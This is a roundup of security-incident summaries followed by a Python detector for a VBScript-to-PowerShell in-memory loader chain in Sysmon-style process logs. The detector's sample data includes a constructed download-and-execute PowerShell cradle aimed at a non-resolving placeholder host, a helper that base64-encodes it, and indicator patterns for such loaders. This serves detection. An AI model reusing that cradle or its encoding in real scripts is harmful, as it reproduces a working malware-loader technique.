The majority of attacks against these organizations were DDoS floods, with a notable difference in duration compared to attacks on Cloudflare's broader customer base.
The attack involved the theft of OAuth credentials from Klue's Battlecards integration, which threat actors then used to access and exfiltrate data from customer Salesforce instances.
Authorities from the Netherlands, Canada, the United States, and Germany removed the SocGholish malware and backdoors from 14,971 compromised WordPress websites, also taking 106 servers and domains offline.
The Shadowbyt3$ threat group claimed responsibility for the incident, alleging the exfiltration of sensitive employee data, including bank statements and W-9 forms.
The Texas Parks and Wildlife Department disclosed that hackers gained access to its license system vendor, which processes hunting and fishing license sales.
The attacker used a multi-stage, in-memory malware chain (a VBScript stager, a PowerShell loader, and Havoc's Demon agent) to gain initial access.
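The chain above (a script-host stager handing off to a PowerShell loader that never writes its payload to disk) leaves a recognizable trace in process-creation telemetry: wscript.exe or cscript.exe spawning powershell.exe with an encoded or download-and-execute command line. The following detector is an added example, not code from the report or from the Havoc project; the events it scans are constructed Sysmon-style ProcessCreate records (field names ParentImage, Image, CommandLine follow Sysmon's schema), and the indicator list, severity levels and the example.invalid URL are illustrative assumptions.

```python
"""Detect a VBScript -> PowerShell in-memory loader chain in process-creation logs.

Added example, not from the original report. The sample events are constructed
Sysmon-style (Event ID 1) records; indicator patterns and severity levels are
assumptions chosen for illustration, not a vendor rule set.
"""
import base64
import re
from typing import Optional

SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")      # where a VBScript stager runs
POWERSHELL = ("powershell.exe", "pwsh.exe")

# Command-line traits of a loader that stays in memory (matched case-insensitively,
# against both the raw command line and any decoded -EncodedCommand payload).
INMEMORY_INDICATORS = {
    "iex": r"\biex\b|invoke-expression",
    "download-cradle": r"downloadstring|downloaddata|net\.webclient|invoke-webrequest",
    "base64-decode": r"frombase64string",
    "reflective-load": r"reflection\.assembly|\[system\.reflection",
    "hidden-window": r"-w(?:indowstyle)?\s+hidden",
    "no-profile": r"-nop\b|-noprofile",
    "bypass-policy": r"-ep\s+bypass|executionpolicy\s+bypass",
}

# PowerShell accepts -e / -ec / -enc / -EncodedCommand followed by base64 of UTF-16LE.
ENC_FLAG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand script, or None if absent or not valid base64."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_event(ev: dict) -> dict:
    """Score one process-creation event for the script-host -> PowerShell loader pattern."""
    parent = ev["ParentImage"].rsplit("\\", 1)[-1].lower()
    image = ev["Image"].rsplit("\\", 1)[-1].lower()
    cmd = ev["CommandLine"]
    decoded = decode_encoded_command(cmd)
    text = cmd if decoded is None else cmd + "\n" + decoded
    hits = sorted(name for name, pat in INMEMORY_INDICATORS.items() if re.search(pat, text, re.I))
    if decoded is not None:
        hits.append("encoded-command")
    lineage = parent in SCRIPT_HOSTS and image in POWERSHELL
    if lineage and hits:
        verdict = "high"        # stager lineage plus in-memory loader traits
    elif lineage or hits:
        verdict = "medium"      # one half of the pattern; worth a look, not a page
    else:
        verdict = "low"
    return {"verdict": verdict, "lineage": lineage, "hits": hits, "decoded": decoded}


def scan(events: list) -> list:
    """Return analysis results for every event that is not low severity."""
    return [r for r in (analyze_event(e) for e in events) if r["verdict"] != "low"]


def encode_command(script: str) -> str:
    """Build a -EncodedCommand argument the way a loader would (constructed helper)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed stage-2 cradle; the host name is reserved (RFC 2606) and never resolves.
STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://loader.example.invalid/s')"
PS_PATH = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed sample telemetry: one loader chain, one benign admin command, one
# script-host-launched PowerShell with no in-memory traits.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\System32\wscript.exe", "Image": PS_PATH,
     "CommandLine": "powershell.exe -nop -w hidden -enc " + encode_command(STAGE2)},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS_PATH,
     "CommandLine": r"powershell.exe Get-ChildItem C:\Users"},
    {"ParentImage": r"C:\Windows\System32\cscript.exe", "Image": PS_PATH,
     "CommandLine": r"powershell.exe -File C:\scripts\cleanup.ps1"},
]

if __name__ == "__main__":
    for result in scan(SAMPLE_EVENTS):
        print(result["verdict"], result["hits"], result["decoded"])
```

Decoding the -EncodedCommand argument before matching is the part that matters: a stager that base64-wraps its cradle defeats a rule that only inspects the raw command line, and matching on lineage alone flags every legitimately scripted PowerShell invocation.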